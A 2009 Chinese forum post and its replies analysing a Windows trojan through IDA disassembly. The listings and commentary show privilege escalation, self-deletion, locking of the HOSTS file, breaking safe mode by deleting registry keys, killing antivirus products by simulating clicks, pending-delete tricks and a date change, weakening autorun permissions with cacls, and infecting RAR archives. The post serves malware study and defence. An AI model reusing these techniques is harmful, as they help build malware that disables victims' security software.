也玩木马分析——从小偷家里偷东西o_0

playboysen 发表于 2009-2-6 08:18

Hello,everyone!
近日老大给我布置了一篇家庭作业，我自然是不敢有半分懈怠，还正赶上老弟对一些木马常用的猥琐伎俩小有兴趣，我也想积累一些Win32汇编编程的经验，于是就抓了这个“小家伙”来玩玩了，从木马中学习编程和杀毒技术，也算是在小偷家里偷东西了吧*_0
小马一匹，什么功能并不是我们要关心的话题，我们主要来看看感兴趣的相关功能的实现代码，也好学习一下，积累编程经验嘛。分析起来很耗时，我们慢慢看吧，分析一些我就再补充一些 *^◎^*

提权：seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394             push ebx
seg001:00406395             add esp, 0FFFFFFD0h
seg001:00406398             lea eax,
seg001:0040639C             push eax          ; TokenHandle
seg001:0040639D             push 20h          ; DesiredAccess
seg001:0040639F             call GetCurrentProcess
seg001:0040639F
seg001:004063A4             push eax          ; ProcessHandle
seg001:004063A5             call OpenProcessToken
seg001:004063A5
seg001:004063AA             lea eax,
seg001:004063AE             push eax          ; lpLuid
seg001:004063AF             push offset Name ; "SeDebugPrivilege"
seg001:004063B4             push 0             ; lpSystemName
seg001:004063B6             call LookupPrivilegeValueA
seg001:004063B6
seg001:004063BB             mov eax,
seg001:004063BF             mov , eax
seg001:004063C3             mov eax,
seg001:004063C7             mov , eax
seg001:004063CB             mov , 1
seg001:004063D3             xor ebx, ebx
seg001:004063D5             mov , ebx
seg001:004063D9             push esp          ; ReturnLength
seg001:004063DA             lea eax,
seg001:004063DE             push eax          ; PreviousState
seg001:004063DF             push 10h          ; BufferLength
seg001:004063E1             lea eax,
seg001:004063E5             push eax          ; NewState
seg001:004063E6             push 0             ; DisableAllPrivileges
seg001:004063E8             mov eax,
seg001:004063EC             push eax          ; TokenHandle
seg001:004063ED             call AdjustTokenPrivileges
seg001:004063ED
seg001:004063F2             mov eax,
seg001:004063F6             mov , eax
seg001:004063FA             mov eax,
seg001:004063FE             mov , eax
seg001:00406402             mov , 1
seg001:0040640A             or    ebx, 2
seg001:0040640D             mov , ebx
seg001:00406411             push esp          ; ReturnLength
seg001:00406412             push 0             ; PreviousState
seg001:00406414             mov eax,
seg001:00406418             push eax          ; BufferLength
seg001:00406419             lea eax,
seg001:0040641D             push eax          ; NewState
seg001:0040641E             push 0             ; DisableAllPrivileges
seg001:00406420             mov eax,
seg001:00406424             push eax          ; TokenHandle
seg001:00406425             call AdjustTokenPrivileges
seg001:00406425
seg001:0040642A             add esp, 30h
seg001:0040642D             pop ebx
seg001:0040642E             retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp注册为系统服务，试图在9X系统上隐藏进程：seg001:00406598 RegisterService proc near
seg001:00406598
seg001:00406598             add esp, 0FFFFFF6Ch
seg001:0040659E             mov , 94h
seg001:004065A5             push esp          ; lpVersionInformation
seg001:004065A6             call GetVersionExA
seg001:004065A6
seg001:004065AB             cmp eax, 1
seg001:004065AE             sbb eax, eax
seg001:004065B0             inc eax
seg001:004065B1             cmp al, 1
seg001:004065B3             jnz short loc_4065FE
seg001:004065B3
seg001:004065B5             cmp , 2
seg001:004065BA             jz    short loc_4065FE
seg001:004065BA
seg001:004065BC             push offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1             call LoadLibraryA
seg001:004065C1
seg001:004065C6             mov hModule, eax
seg001:004065CB             cmp hModule, 0
seg001:004065D2             jz    short loc_4065FE
seg001:004065D2
seg001:004065D4             push offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9             mov eax, hModule
seg001:004065DE             push eax          ; hModule
seg001:004065DF             call GetProcAddress
seg001:004065DF
seg001:004065E4             mov addr_RegisterServiceProcess, eax
seg001:004065E9             push 1
seg001:004065EB             push 0
seg001:004065ED             call addr_RegisterServiceProcess
seg001:004065F3             mov eax, hModule
seg001:004065F8             push eax          ; hLibModule
seg001:004065F9             call FreeLibrary_0 ; "kernel32.dll"
seg001:004065F9
seg001:004065FE loc_4065FE:
seg001:004065FE             add esp, 94h
seg001:00406604             retn
seg001:00406604
seg001:00406604 RegisterService endp删除自身——“cmd.exe /c del 木马本身路径”：seg001:00406A70 del_self    proc near
seg001:00406A70
seg001:00406A70             push ebp
seg001:00406A71             mov ebp, esp
seg001:00406A73             add esp, 0FFFFFEECh
seg001:00406A79             xor eax, eax
seg001:00406A7B             mov , eax
seg001:00406A81             mov , eax
seg001:00406A87             mov , eax
seg001:00406A8D             xor eax, eax
seg001:00406A8F             push ebp
seg001:00406A90             push offset sub_406B2B
seg001:00406A95             push dword ptr fs:
seg001:00406A98             mov fs:, esp
seg001:00406A9B             push 104h          ; nSize
seg001:00406AA0             lea eax,
seg001:00406AA6             push eax          ; lpBuffer
seg001:00406AA7             push offset s_Comspec ; "Comspec"
seg001:00406AAC             call GetEnvironmentVariableA ; 获取环境变量，查找cmd.exe文件路径
seg001:00406AAC
seg001:00406AB1             push 0
seg001:00406AB3             lea eax,
seg001:00406AB9             lea edx,
seg001:00406ABF             mov ecx, 105h
seg001:00406AC4             call sub_403D34
seg001:00406AC4
seg001:00406AC9             push
seg001:00406ACF             push offset s_CDel ; " /c del \""
seg001:00406AD4             lea edx,
seg001:00406ADA             xor eax, eax
seg001:00406ADC             call sub_402708    ; GetModuleFileNameA获取木马文件路径
seg001:00406ADC
seg001:00406AE1             push
seg001:00406AE7             push offset dword_406B5C ; uCmdShow
seg001:00406AEC             lea eax,
seg001:00406AF2             mov edx, 4
seg001:00406AF7             call sub_403E0C
seg001:00406AF7
seg001:00406AFC             mov eax,
seg001:00406B02             call sub_403F4C
seg001:00406B02
seg001:00406B07             push eax          ; lpCmdLine
seg001:00406B08             call WinExec       ; 即 “cmd.exe /c del 木马本身路径”
seg001:00406B08
seg001:00406B0D             xor eax, eax
seg001:00406B0F             pop edx
seg001:00406B10             pop ecx
seg001:00406B11             pop ecx
seg001:00406B12             mov fs:, edx
seg001:00406B15             push offset loc_406B32
seg001:00406B15
seg001:00406B1A loc_406B1A:
seg001:00406B1A             lea eax,
seg001:00406B20             mov edx, 3
seg001:00406B25             call sub_403BEC
seg001:00406B25
seg001:00406B2A             retn程序运行后清空系统HOSTS文件，然后以独占方式锁定HOSTS和系统启动配置文件，防止用户或某些软件写HOSTS屏蔽木马网址，防止XDELBOX类程序重启删除木马：seg001:00409138             mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D             call sub_403D54
seg001:0040913D
seg001:00409142             mov eax,
seg001:00409148             call FindFile_AdjustFileTime; 查找文件，若找到就修正文件时间（FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime）
seg001:00409148
seg001:0040914D             cmp al, 1
seg001:0040914F             jnz short loc_409194
seg001:0040914F
seg001:00409151             lea eax,
seg001:00409157             call GetSystemDirectory
seg001:00409157
seg001:0040915C             lea eax,
seg001:00409162             mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167             call sub_403D54
seg001:00409167
seg001:0040916C             mov eax,
seg001:00409172             call sub_403F4C
seg001:00409172
seg001:00409177             mov edx, eax
seg001:00409179             lea eax,
seg001:0040917F             call sub_403CF8
seg001:0040917F
seg001:00409184             mov eax,
seg001:0040918A             mov edx, 10h
seg001:0040918F             call sub_4066AC    ; CreateFileA以独占方式打开文件，防修改
seg001:0040918F
seg001:00409194
seg001:00409194 loc_409194:                         ; CODE XREF: seg001:0040914Fj
seg001:00409194             lea eax,
seg001:0040919A             call sub_406DEC
seg001:0040919A
seg001:0040919F             lea eax,
seg001:004091A5             mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA             call sub_403D54
seg001:004091AA
seg001:004091AF             mov eax,
seg001:004091B5             call FindFile_AdjustFileTime; 查找文件，若找到就修正文件时间（FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime）
seg001:004091B5
seg001:004091BA             cmp al, 1
seg001:004091BC             jnz short loc_409201
seg001:004091BC
seg001:004091BE             lea eax,
seg001:004091C4             call sub_406DEC
seg001:004091C4
seg001:004091C9             lea eax,
seg001:004091CF             mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4             call sub_403D54
seg001:004091D4
seg001:004091D9             mov eax,
seg001:004091DF             call sub_403F4C
seg001:004091DF
seg001:004091E4             mov edx, eax
seg001:004091E6             lea eax,
seg001:004091EC             call sub_403CF8
seg001:004091EC
seg001:004091F1             mov eax,
seg001:004091F7             mov edx, 10h
seg001:004091FC             call sub_4066AC    ; 独占方式打开文件，防修改删除相关注册表项，破坏安全模式:
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}seg001:0040C6FF Del_Key:
seg001:0040C6FF             mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704             mov edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C709             mov eax, 80000002h
seg001:0040C70E             call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C70E
seg001:0040C713             cmp al, 1
seg001:0040C715             jnz short loc_40C726
seg001:0040C715
seg001:0040C717             mov edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C71C             mov eax, 80000002h
seg001:0040C721             call RegDeleteKey ; 删除相关键值
seg001:0040C721
seg001:0040C726 Del_Key:
seg001:0040C726             mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B             mov edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C730             mov eax, 80000002h
seg001:0040C735             call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C735
seg001:0040C73A             cmp al, 1
seg001:0040C73C             jnz short loc_40C74D
seg001:0040C73C
seg001:0040C73E             mov edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C743             mov eax, 80000002h
seg001:0040C748             call RegDeleteKey删除以下注册表项，使得镜像劫持失效
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Optionsseg001:0040C76C             mov edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771             mov eax, 80000002h
seg001:0040C776             call near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C776
seg001:0040C77B             cmp al, 1
seg001:0040C77D             jnz short loc_40C7AA
seg001:0040C77D
seg001:0040C77F             push offset s_SoftwareMic_8 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C784             mov eax, off_41356C
seg001:0040C789             push dword ptr
seg001:0040C78B             push offset dword_40C884
seg001:0040C790             lea eax,
seg001:0040C793             mov edx, 3
seg001:0040C798             call sub_403E0C
seg001:0040C798
seg001:0040C79D             mov edx,
seg001:0040C7A0             mov eax, 80000002h
seg001:0040C7A5             call RegDeleteKey设置USB写保护、文件彻底隐藏、修改U盘和光盘为自运行，关闭系统错误报告服务（修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting的DoReport、ShowUI、ReportBootOk，键为0）seg001:0040A080             push edi          ; phkResult
seg001:0040A081             push offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies
seg001:0040A086             push 80000002h    ; hKey
seg001:0040A08B             call RegOpenKeyA
seg001:0040A08B
seg001:0040A090             push 4             ; cbData
seg001:0040A092             lea eax,
seg001:0040A095             push eax          ; lpData
seg001:0040A096             push 4             ; dwType
seg001:0040A098             push 0             ; Reserved
seg001:0040A09A             push offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F             mov eax,
seg001:0040A0A1             push eax          ; hKey
seg001:0040A0A2             call RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7             mov eax,
seg001:0040A0A9             push eax          ; hKey
seg001:0040A0AA             call RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF             xor eax, eax
seg001:0040A0B1             mov dword ptr , eax
seg001:0040A0B4             push edi          ; phkResult
seg001:0040A0B5             push offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA             push 80000001h    ; hKey
seg001:0040A0BF             call RegOpenKeyA
seg001:0040A0BF
seg001:0040A0C4             push 4             ; cbData
seg001:0040A0C6             lea eax,
seg001:0040A0C9             push eax          ; lpData
seg001:0040A0CA             push 4             ; dwType
seg001:0040A0CC             push 0             ; Reserved
seg001:0040A0CE             push offset s_Showsuperhidd ; "ShowSuperHidden"
seg001:0040A0D3             mov eax,
seg001:0040A0D5             push eax          ; hKey
seg001:0040A0D6             call RegSetValueExA
seg001:0040A0D6
seg001:0040A0DB             mov eax,
seg001:0040A0DD             push eax          ; hKey
seg001:0040A0DE             call RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3             mov dword ptr , 91h
seg001:0040A0EA             push edi          ; phkResult
seg001:0040A0EB             push offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0             push 80000002h    ; hKey
seg001:0040A0F5             call RegOpenKeyA
seg001:0040A0F5
seg001:0040A0FA             push 4             ; cbData
seg001:0040A0FC             lea eax,
seg001:0040A0FF             push eax          ; lpData
seg001:0040A100             push 4             ; dwType
seg001:0040A102             push 0             ; Reserved
seg001:0040A104             push offset s_Nodrivetypeau ; "NoDriveTypeAutoRun"
seg001:0040A109             mov eax,
seg001:0040A10B             push eax          ; hKey
seg001:0040A10C             call RegSetValueExA
seg001:0040A10C
seg001:0040A111             mov eax,
seg001:0040A113             push eax          ; hKey
seg001:0040A114             call RegCloseKey_0
......通过延迟删除bsmain.exe和RavExt.dll文件来破坏瑞星杀毒软件：

在Windows 2000/XP/Server 2003里面，软件厂商在碰到文件被占用无法马上替换或者删除问题的时候，都会使用MoveFileEx API函数让系统在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session ManagerValue:PendingFileRenameOperations键值下面建立一个延迟删除列表，系统在下次启动的时候，CSRSS.EXE进程将根据这个列表对文件进行延迟更新或者延迟删除操作。
PendingFileRenameOperations是一个REG_MULTI_SZ类型的注册表键值，不能直接通过注册表编辑器编辑，否则会造成延迟删除列表被破坏。要查看这个键值的内容，可以使用注册表编辑器或者专用注册表操作工具。Windows XP在安装完需要重启的补丁以后就是利用PendingFileRenameOperations控制被占用文件进行被占用文件的升级和删除操作的。seg001:00409CF3             mov ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8             mov edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD             mov eax, 80000002h
seg001:00409D02             call sub_408150
seg001:00409D02
......
seg001:00409DF9             push 4             ; dwFlags
seg001:00409DFB             push 0             ; lpNewFileName
seg001:00409DFD             lea eax,
seg001:00409E03             call GetSystemDirectory
seg001:00409E03
seg001:00409E08             lea eax,
seg001:00409E0E             mov edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13             call sub_403D54
seg001:00409E13
seg001:00409E18             mov eax,
seg001:00409E1E             call sub_403F4C
seg001:00409E1E
seg001:00409E23             push eax          ; lpExistingFileName
seg001:00409E24             call MoveFileExA
seg001:00409E24
seg001:00409E29             push 4             ; dwFlags
seg001:00409E2B             push 0             ; lpNewFileName
seg001:00409E2D             lea eax,
seg001:00409E33             call GetSystemDirectory
seg001:00409E33
seg001:00409E38             lea eax,
seg001:00409E3E             mov edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43             call sub_403D54
seg001:00409E43
seg001:00409E48             mov eax,
seg001:00409E4E             call sub_403F4C
seg001:00409E4E
seg001:00409E53             push eax          ; lpExistingFileName
seg001:00409E54             call MoveFileExA破解NTFS的AUTO免疫：
使用命令行工具cacls.exe来提高everyone用户对文件autorun.inf的控制权限

CACLS filename
显示或者修改文件的访问控制表(ACL)
filename    显示 ACL。
/T          更改当前目录及其所有子目录中指定文件的 ACL。
/G user:perm赋予指定用户访问权限。
            Perm 可以是: R读取
                           W写入
                           C更改(写入)
                           F完全控制seg001:0040D15D             mov eax,
seg001:0040D160             call GetVolumeInformation
seg001:0040D160
seg001:0040D165             mov eax,
seg001:0040D16B             mov edx, offset s_Ntfs ; "NTFS"
seg001:0040D170             call sub_403E98
seg001:0040D170
seg001:0040D175             jnz short loc_40D1B1
seg001:0040D175
seg001:0040D177             push 0
seg001:0040D179             push offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls "
seg001:0040D17E             push
seg001:0040D181             push offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F"
seg001:0040D186             lea eax, 模拟发送点击按钮消息来自动卸载金山毒霸2008seg001:0040DAB4 KillDuBa    proc near             ; DATA XREF: start+1126o
seg001:0040DAB4             push ebx
seg001:0040DAB5             push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DABA             push offset s_32770_1 ; "#32770"
seg001:0040DABF             call FindWindowA
seg001:0040DABF
seg001:0040DAC4             mov ebx, eax
seg001:0040DAC6             push offset s_N> ; "下一步(&N) >"
seg001:0040DACB             push offset s_Button_0 ; "Button"
seg001:0040DAD0             push 0             ; HWND
seg001:0040DAD2             push ebx          ; HWND
seg001:0040DAD3             call FindWindowExA
seg001:0040DAD3
seg001:0040DAD8             mov ebx, eax
seg001:0040DADA             push 0             ; lParam
seg001:0040DADC             push 0             ; wParam
seg001:0040DADE             push 0F5h          ; Msg
seg001:0040DAE3             push ebx          ; hWnd
seg001:0040DAE4             call SendMessageA
seg001:0040DAE4
seg001:0040DAE9             push 0             ; lParam
seg001:0040DAEB             push 0             ; wParam
seg001:0040DAED             push 0F5h          ; Msg
seg001:0040DAF2             push ebx          ; hWnd
seg001:0040DAF3             call SendMessageA
seg001:0040DAF3
seg001:0040DAF8             push 320h          ; dwMilliseconds
seg001:0040DAFD             call Sleep
seg001:0040DAFD
seg001:0040DB02             push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DB07             push offset s_32770_1 ; "#32770"
seg001:0040DB0C             call FindWindowA
seg001:0040DB0C
seg001:0040DB11             mov ebx, eax
seg001:0040DB13             push offset s_U    ; "卸载(&U)"
seg001:0040DB18             push offset s_Button_0 ; "Button"
seg001:0040DB1D             push 0             ; HWND
seg001:0040DB1F             push ebx          ; HWND
seg001:0040DB20             call FindWindowExA
seg001:0040DB20
seg001:0040DB25             mov ebx, eax
seg001:0040DB27             push 0             ; lParam
seg001:0040DB29             push 0             ; wParam
seg001:0040DB2B             push 0F5h          ; Msg
seg001:0040DB30             push ebx          ; hWnd
seg001:0040DB31             call SendMessageA
seg001:0040DB31
seg001:0040DB36             push 0             ; lParam
seg001:0040DB38             push 0             ; wParam
seg001:0040DB3A             push 0F5h          ; Msg
seg001:0040DB3F             push ebx          ; hWnd
seg001:0040DB40             call SendMessageA
seg001:0040DB40
seg001:0040DB45             push 0BB8h       ; dwMilliseconds
seg001:0040DB4A             call Sleep
seg001:0040DB4A
seg001:0040DB4F             push 0             ; lpWindowName
seg001:0040DB51             push offset s_Ieframe_0 ; "IEFrame"
seg001:0040DB56             call FindWindowA
seg001:0040DB56
seg001:0040DB5B             mov ebx, eax
seg001:0040DB5D             push 1             ; lParam
seg001:0040DB5F             push 0F060h       ; wParam
seg001:0040DB64             push 112h          ; Msg
seg001:0040DB69             push ebx          ; hWnd
seg001:0040DB6A             call SendMessageA
seg001:0040DB6A
seg001:0040DB6F             pop ebx
seg001:0040DB70             retn
seg001:0040DB70
seg001:0040DB70 KillDuBa    endp感染植入木马到.rar和.zip压缩包——“WinRAR.exe a -ep -u -inul”：
命令行模式：
A    ——添加文件到压缩包
-ep ——添加文件时不包含路径信息
-u ——更新文件
-inul——禁止错误提示信息seg001:0040F7E6             push 0
seg001:0040F7E8             push dword_4149D4
seg001:0040F7EE             push offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3             push dword_4149D0
seg001:0040F7F9             push offset dword_40FF5C
seg001:0040F7FE             push ; uCmdShow
seg001:0040F801             lea eax,
seg001:0040F807             mov edx, 5
seg001:0040F80C             call sub_403E0C
seg001:0040F80C
seg001:0040F811             mov eax,
seg001:0040F817             call sub_403F4C
seg001:0040F817
seg001:0040F81C             push eax          ; lpCmdLine
seg001:0040F81D             call WinExec键盘映射Win+M(最小化所有窗口)然后阻止瑞星正常升级，最小化操作卡巴卸载程序来卸载卡巴，由于对卡巴的操作与下面的代码大同小异，故不再贴出，不过有一点说明，对付卡巴时，此木马还增加了命令“cmd /c Date 2005-4-20”来突破卡巴主动防御seg001:0041129F             mov eax, offset s_Ravmon_exe ; "RavMon.exe"
seg001:004112A4             call sub_4076E8
seg001:004112A4
seg001:004112A9             cmp al, 1
seg001:004112AB             jnz loc_411387
seg001:004112AB
seg001:004112B1             lea eax,
seg001:004112B7             push eax
seg001:004112B8             mov ecx, offset s_Installpath ; "installpath"
seg001:004112BD             mov edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2             mov eax, 80000002h
seg001:004112C7             call RegQueryValue
......
seg001:004112D7
seg001:004112DC             push 0             ; dwExtraInfo
seg001:004112DE             push 0             ; dwFlags
seg001:004112E0             push 0             ; uMapType
seg001:004112E2             push 5Bh          ; uCode 5Bh微软左徽标键
seg001:004112E4             call MapVirtualKeyA
seg001:004112E4
seg001:004112E9             push eax          ; bScan
seg001:004112EA             push 5Bh          ; bVk
seg001:004112EC             call keybd_event
seg001:004112EC
seg001:004112F1             push 0             ; dwExtraInfo
seg001:004112F3             push 0             ; dwFlags
seg001:004112F5             push 0             ; uMapType
seg001:004112F7             push 4Dh          ; uCode 4Dh是"M"
seg001:004112F9             call MapVirtualKeyA
......
seg001:0041132B
seg001:00411330             push 1             ; uCmdShow
seg001:00411332             mov edx, off_413554
seg001:00411338             mov edx,
seg001:0041133A             lea eax,
seg001:00411340             mov ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345             call sub_403D98
seg001:00411345
seg001:0041134A             mov eax,
seg001:00411350             call sub_403F4C
seg001:00411350
seg001:00411355             push eax          ; lpCmdLine
seg001:00411356             call WinExec
seg001:00411356
seg001:0041135B             push 5DCh          ; dwMilliseconds
seg001:00411360             call Sleep
seg001:00411360
seg001:00411365             mov eax, lpThreadId
seg001:0041136A             push eax          ; lpThreadId
seg001:0041136B             push 0             ; dwCreationFlags
seg001:0041136D             push 0             ; lpParameter
seg001:0041136F             push offset sub_40DBC8 ; lpStartAddress
seg001:00411374             push 0             ; dwStackSize
seg001:00411376             push 0             ; lpThreadAttributes
seg001:00411378             call CreateThread
seg001:00411378
seg001:0041137D             push 0DACh       ; dwMilliseconds
seg001:00411382             call Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387:                         ; CODE XREF: start+E47j
seg001:00411387             mov eax, offset s_Avp_exe ; "avp.exe"
seg001:0041138C             call sub_4076E8
seg001:0041138C
seg001:00411391             cmp al, 1
seg001:00411393             jnz uninstall
......

wgz001 发表于 2009-2-6 08:33

木马分析太强大了
请问楼主是裸奔么

forgetmenot 发表于 2009-2-6 08:45

真行,没来一会,大家变强了

sfl4800 发表于 2009-2-6 09:00

分析比马马更强大。。

YeMelody 发表于 2009-2-6 09:51

总算看得懂:victory: :victory:

lccsher 发表于 2009-2-6 10:28

太能分析了.支持原创

zyftheone 发表于 2009-2-6 10:30

来学习了，躺下来漫漫看

a86350703 发表于 2009-2-6 11:11

楼主真是强悍啊，佩服至极

playboysen 发表于 2009-2-6 12:31

原帖由 wgz001 于 2009-2-6 08:33 发表 http://bbs.52pojie.cn/images/common/back.gif
木马分析太强大了
请问楼主是裸奔么

初次木马分析，请指教:handshake

半裸——Shadow Defender

cqbinbin 发表于 2009-2-7 11:12

都很厉害~~~~~~~

页: [1] 2 3 4 5 6 7 8 9 10

吾爱破解 - 52pojie.cn's Archiver

也玩木马分析——从小偷家里偷东西o_0